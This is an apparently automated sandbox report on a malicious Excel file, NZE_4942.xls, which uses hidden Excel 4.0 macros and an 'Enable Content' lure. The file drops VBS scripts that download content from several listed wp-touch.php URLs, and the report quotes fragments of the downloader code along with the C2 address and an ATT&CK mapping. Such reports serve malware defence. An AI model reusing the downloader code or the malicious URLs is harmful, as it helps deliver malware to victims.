Loading ...

Play interactive tourEdit tour

Analysis Report NZE_4942.xls

Overview

General Information

Sample Name:NZE_4942.xls
Analysis ID:289338
MD5:2a4f47e72368f146cd2fcfc3b595be24
SHA1:6ab7f3f40717ab49f2bf04f0e62bcc32f91f4efc
SHA256:1dc66813f21fd098e649bf60a6807d6d1ea5b875cbbb7e593ff92a88a1943a2d

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Office product drops script at suspicious location
System process connects to network (likely due to code injection or exploit)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Injects code into the Windows Explorer (explorer.exe)
Microsoft Office drops suspicious files
Potential malicious VBS script found (has network functionality)
Potential malicious VBS script found (suspicious strings)
Contains capabilities to detect virtual machines
Document contains embedded VBA macros
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1204 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • explorer.exe (PID: 2496 cmdline: explorer.exe C:\Users\user\AppData\Local\Temp\lj06.vbs MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • explorer.exe (PID: 2376 cmdline: explorer.exe C:\Users\user\AppData\Local\Temp\iNU7.vbs MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
  • explorer.exe (PID: 2532 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • wscript.exe (PID: 2504 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\lj06.vbs' MD5: 045451FA238A75305CC26AC982472367)
  • explorer.exe (PID: 2648 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • wscript.exe (PID: 2708 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\iNU7.vbs' MD5: 045451FA238A75305CC26AC982472367)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Office product drops script at suspicious locationShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 1204, TargetFilename: C:\Users\user\AppData\Local\Temp\lj06.vbs

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: https://marketingblueprints.club/wp-touch.phpAvira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URLShow sources
Source: https://polyet-store.com/wp-touch.phpVirustotal: Detection: 7%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: NZE_4942.xlsVirustotal: Detection: 15%Perma Link

Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\lj06.vbsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\iNU7.vbsJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\explorer.exeJump to behavior
Source: global trafficDNS query: name: loveleigh.seo-and-web-design.com
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 140.82.62.250:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 140.82.62.250:443

Networking:

barindex
Potential malicious VBS script found (has network functionality)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: sX4IzDE.OpensX4IzDE.Type = 1sX4IzDE.Write jISdL.ResponseBodyJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: sX4IzDE.OpensX4IzDE.Type = 1sX4IzDE.Write jISdL.ResponseBodyJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: sX4IzDE.SaveToFile "C:\Users\user\AppData\Local\Temp\qJjKE.html",2sX4IzDE.CloseExit ForEnd IfNextJump to dropped file
Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: wscript.exe, 00000007.00000002.2121123697.0000000005E00000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: loveleigh.seo-and-web-design.com
Source: wscript.exe, 00000007.00000002.2121123697.0000000005E00000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: wscript.exe, 00000007.00000002.2121123697.0000000005E00000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: wscript.exe, 00000007.00000002.2121359892.0000000005FE7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: wscript.exe, 00000007.00000002.2121359892.0000000005FE7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: wscript.exe, 00000007.00000002.2116590240.0000000000446000.00000004.00000001.sdmpString found in binary or memory: http://msbibo.ch/wp-touch.php
Source: explorer.exe, 00000002.00000002.2098930430.0000000001C30000.00000002.00000001.sdmp, explorer.exe, 00000003.00000002.2226707649.0000000001C20000.00000002.00000001.sdmp, explorer.exe, 00000005.00000002.2105931995.0000000001C60000.00000002.00000001.sdmp, explorer.exe, 00000006.00000002.2233143043.0000000001DB0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000003.00000002.2227442629.00000000028B0000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.2099096218.0000000001CE0000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.2116606678.0000000001C30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: wscript.exe, 00000007.00000002.2121359892.0000000005FE7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000002.00000002.2098930430.0000000001C30000.00000002.00000001.sdmp, explorer.exe, 00000003.00000002.2226707649.0000000001C20000.00000002.00000001.sdmp, explorer.exe, 00000005.00000002.2105931995.0000000001C60000.00000002.00000001.sdmp, explorer.exe, 00000006.00000002.2233143043.0000000001DB0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: wscript.exe, 00000007.00000002.2121123697.0000000005E00000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: wscript.exe, 00000007.00000002.2121359892.0000000005FE7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: wscript.exe, 00000007.00000002.2121123697.0000000005E00000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: wscript.exe, 00000007.00000002.2121123697.0000000005E00000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: wscript.exe, 00000007.00000002.2116590240.0000000000446000.00000004.00000001.sdmpString found in binary or memory: https://loveleigh.seo-and-web-design.com/wp-touch.php
Source: wscript.exe, 00000007.00000002.2116590240.0000000000446000.00000004.00000001.sdmpString found in binary or memory: https://loveleigh.seo-and-web-design.com/wp-touch.phpz
Source: wscript.exe, 00000007.00000002.2116590240.0000000000446000.00000004.00000001.sdmpString found in binary or memory: https://marketingblueprints.club/wp-touch.php
Source: wscript.exe, 00000007.00000002.2116590240.0000000000446000.00000004.00000001.sdmpString found in binary or memory: https://polyet-store.com/wp-touch.php
Source: wscript.exe, 00000007.00000002.2116590240.0000000000446000.00000004.00000001.sdmpString found in binary or memory: https://polyet-store.com/wp-touch.phpp
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing' and 'Enable Content' 12 13 14 15 16 17 18 " 20 21 22 23 24 25 26 m
Source: Screenshot number: 4Screenshot OCR: Protected document 7 8 9 10 11 In order to view the document, you must press buttons 'Enable Ed
Source: Screenshot number: 4Screenshot OCR: Enable Content' 12 13 14 15 16 17 18 " 20 21 22 23 24 25 26 m m 'GJ ',9 "0],| U
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: NZE_4942.xlsInitial sample: WORKSPACE
Microsoft Office drops suspicious filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\lj06.vbsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\iNU7.vbsJump to behavior
Potential malicious VBS script found (suspicious strings)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: HGURV = Array(kmr,xLO,YLjFcGA,LmXG)Dim jISdL: Set jISdL = CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: HGURV = Array(kmr,xLO,YLjFcGA,LmXG)Dim jISdL: Set jISdL = CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: HGURV = Array(kmr,xLO,YLjFcGA,LmXG)Dim jISdL: Set jISdL = CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: HGURV = Array(kmr,xLO,YLjFcGA,LmXG)Dim jISdL: Set jISdL = CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: HGURV = Array(kmr,xLO,YLjFcGA,LmXG)Dim jISdL: Set jISdL = CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped file: HGURV = Array(kmr,xLO,YLjFcGA,LmXG)Dim jISdL: Set jISdL = CreateObject("MSXML2.ServerXMLHTTP.6.0")Jump to dropped file
Source: NZE_4942.xlsOLE indicator, VBA macros: true
Source: wscript.exe, 00000007.00000002.2121123697.0000000005E00000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal100.expl.evad.winXLS@11/8@2/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\D2EE0000Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD900.tmpJump to behavior
Source: NZE_4942.xlsOLE indicator, Workbook stream: true
Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\lj06.vbs
Source: unknownProcess created: C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\explorer.exeJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\explorer.exeJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\explorer.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: NZE_4942.xlsVirustotal: Detection: 15%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\lj06.vbs
Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\lj06.vbs'
Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\iNU7.vbs
Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\iNU7.vbs'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\lj06.vbsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\iNU7.vbsJump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\lj06.vbs' Jump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\iNU7.vbs' Jump to behavior
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeFile opened / queried: IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\explorer.exe TID: 2304Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\explorer.exe TID: 2304Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\explorer.exe TID: 2500Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\explorer.exe TID: 2584Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\explorer.exe TID: 2584Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\explorer.exe TID: 2764Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\wscript.exe TID: 260Thread sleep time: -60000s >= -30000sJump to behavior
Source: explorer.exe, 00000006.00000003.2105048811.00000000002FA000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\wscript.exeNetwork Connect: 140.82.62.250 187Jump to behavior
Injects code into the Windows Explorer (explorer.exe)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 2496 base: 50000 value: 01Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 2496 base: 50020 value: 9AJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 2496 base: 7FFFFFD9368 value: 00Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 2376 base: 50000 value: 01Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 2376 base: 50020 value: 9AJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 2376 base: 7FFFFFD8368 value: 00Jump to behavior
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting321Path InterceptionProcess Injection21Masquerading1OS Credential DumpingSecurity Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion2Security Account ManagerRemote System Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection21NTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting321LSA SecretsSystem Information Discovery3SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.